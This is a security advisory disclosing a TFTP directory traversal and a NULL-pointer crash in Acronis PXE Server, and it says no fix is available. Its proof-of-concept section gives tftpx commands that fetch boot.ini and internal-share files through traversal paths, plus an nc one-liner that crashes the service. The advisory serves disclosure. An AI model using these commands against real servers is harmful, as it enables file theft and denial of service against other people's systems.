####################################################################### Luigi Auriemma Application: Acronis PXE Server http://www.acronis.com/enterprise/products/snapdeploy/ Versions: <= 2.0.0.1076 Platforms: Windows Bugs: A] directory traversal B] NULL pointer Exploitation: remote Date: 08 Mar 2008 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== The Acronis PXE Server is an essential component of Acronis Snap Deploy Server, a deployment solution for automatically configuring all the clients of the local network. ####################################################################### ======= 2) Bugs ======= ---------------------- A] directory traversal ---------------------- The PXE Server (pxesrv.exe) implements a TFTP server for allowing the downloading of the bootstrap files (uploading is not allowed). This service is vulnerable to a classical directory traversal and an arbitrary path attacks which allow an attacker to download any file from the local disks or the network shares. --------------- B] NULL pointer --------------- An incomplete TFTP request (everything which goes from the simple absence of the option field to the usage of only the 2 bytes for the opcode) causes the crashing of the PXE Server due to a NULL pointer access. ####################################################################### =========== 3) The Code =========== A] http://aluigi.org/testz/tftpx.zip tftpx SERVER ..\../..\../boot.ini none tftpx SERVER c:\boot.ini none tftpx SERVER \\internal_host\documents\file.txt none B] send the bytes 00 01 to UDP port 69 of the server: echo -n -e \x00\x01|nc SERVER 69 -v -v -u ####################################################################### ====== 4) Fix ====== No fix #######################################################################